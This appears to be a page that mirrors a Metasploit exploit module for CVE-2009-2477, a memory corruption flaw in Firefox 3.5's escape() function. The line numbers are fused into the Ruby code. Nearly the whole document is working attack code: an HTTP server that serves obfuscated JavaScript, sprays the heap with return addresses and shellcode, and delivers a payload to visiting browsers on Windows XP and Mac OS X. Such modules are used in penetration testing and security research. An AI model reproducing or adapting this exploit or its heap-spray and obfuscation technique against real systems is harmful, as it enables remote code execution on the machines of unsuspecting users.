CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/multi/browser/firefox_escape_retval.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = NormalRanking78#9# This module acts as an HTTP server10#11include Msf::Exploit::Remote::HttpServer::HTML1213#include Msf::Exploit::Remote::BrowserAutopwn14#autopwn_info({15# :ua_name => HttpClients::FF,16# :ua_minver => "3.5",17# :ua_maxver => "3.5",18# :os_name => OperatingSystems::Match::WINDOWS,19# :javascript => true,20# :rank => NormalRanking, # reliable memory corruption21# :vuln_test => nil,22#})2324def initialize(info = {})25super(update_info(info,26'Name' => 'Firefox 3.5 escape() Return Value Memory Corruption',27'Description' => %q{28This module exploits a memory corruption vulnerability in the Mozilla29Firefox browser. This flaw occurs when a bug in the javascript interpreter30fails to preserve the return value of the escape() function and results in31uninitialized memory being used instead. This module has only been tested32on Windows, but should work on other platforms as well with the current33targets.34},35'License' => MSF_LICENSE,36'Author' =>37[38'Simon Berry-Byrne <x00050876[at]itnet.ie>', # Author / Publisher / Original exploit39'hdm', # Metasploit conversion40],41'References' =>42[43['CVE', '2009-2477'],44['OSVDB', '55846'],45['BID', '35660'],46['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=503286']47],48'Payload' =>49{50'Space' => 1000 + (rand(256).to_i * 4),51'BadChars' => "\x00",52},53'Platform' => %w{ win osx },54'Targets' =>55[56[ 'Firefox 3.5.0 on Windows XP SP0-SP3',57{58'Platform' => 'win',59'Arch' => ARCH_X86,60'Ret' => 0x0c0c0c0c,61'BlockLen' => 0x60000,62'Containers' => 800,63}64],65[ 'Firefox 3.5.0 on Mac OS X 10.5.7 (Intel)',66{67'Platform' => 'osx',68'Arch' => ARCH_X86,69'Ret' => 0x41414141,70'BlockLen' => 496,71'Containers' => 80000072}73]74],75'DefaultTarget' => 0,76'DisclosureDate' => '2009-07-13'77))78end798081def on_request_uri(cli, request)8283# Re-generate the payload84return if ((p = regenerate_payload(cli)) == nil)8586print_status("Sending #{self.name}")87send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html; charset=utf-8' })88handler(cli)89end9091def generate_html(payload)9293enc_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))94enc_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(target.arch))95enc_ret = Rex::Text.to_unescape(96Rex::Arch.endian(target.arch) == ENDIAN_LITTLE ? [target.ret].pack('V') : [target.ret].pack('N')97)9899var_data_str1 = Rex::Text.rand_text_alpha(3)100var_data_str2 = Rex::Text.rand_text_alpha(4)101js = <<-EOF102var xunescape = unescape;103var shellcode = xunescape("#{enc_code}");104105oneblock = xunescape("#{enc_ret}");106107var fullblock = oneblock;108while (fullblock.length < #{target['BlockLen']})109{110fullblock += fullblock;111}112113var sprayContainer = new Array();114var sprayready = false;115var sprayContainerIndex = 0;116117function fill_function()118{119if(! sprayready) {120for (xi=0; xi<#{target['Containers']}/100; xi++, sprayContainerIndex++)121{122sprayContainer[sprayContainerIndex] = fullblock + shellcode;123}124} else {125DataTranslator();126GenerateHTML();127}128if(sprayContainer.length >= #{target['Containers']}) {129sprayready = true;130}131}132133var searchArray = new Array();134135function escapeData(data)136{137var xi;138var xc;139var escData='';140for(xi=0; xi<data.length; xi++)141{142xc=data.charAt(xi);143if(xc=='&' || xc=='?' || xc=='=' || xc=='%' || xc==' ') xc = escape(xc);144escData+=xc;145}146return escData;147}148149function DataTranslator()150{151searchArray = new Array();152searchArray[0] = new Array();153searchArray[0]["#{var_data_str1}"] = "#{var_data_str2}";154var newElement = document.getElementById("content");155if (document.getElementsByTagName) {156var xi=0;157pTags = newElement.getElementsByTagName("p");158if (pTags.length > 0)159while (xi < pTags.length)160{161oTags = pTags[xi].getElementsByTagName("font");162searchArray[xi+1] = new Array();163if (oTags[0]) {164searchArray[xi+1]["#{var_data_str1}"] = oTags[0].innerHTML;165}166xi++;167}168}169}170171function GenerateHTML()172{173var xhtml = "";174for (xi=1;xi<searchArray.length;xi++)175{176xhtml += escapeData(searchArray[xi]["#{var_data_str1}"]);177}178}179180setInterval("fill_function()", .5);181EOF182183# Obfuscate it up a bit184js = obfuscate_js(js, 'Symbols' => {185'Variables' => %W{ DataTranslator GenerateHTML escapeData xunescape186shellcode oneblock fullblock sprayContainer xi searchArray xc187escData xhtml pTags oTags newElement sprayready sprayContainerIndex188fill_function }189}).to_s190191str1 = Rex::Text.rand_text_alpha(20)192str2 = Rex::Text.rand_text_alpha(24)193str3 = Rex::Text.rand_text_alpha(10) + " "194195return %Q^196<html>197<head>198<div id="content">199<p>200<FONT>201</FONT>202</p>203<p>204<FONT>#{str1}</FONT></p>205<p>206<FONT>#{str2}</FONT>207</p>208<p>209<FONT>#{str3}</FONT>210</p>211</div>212<script language="JavaScript">213#{js}214</script>215</body>216</html>217^218219end220end221222223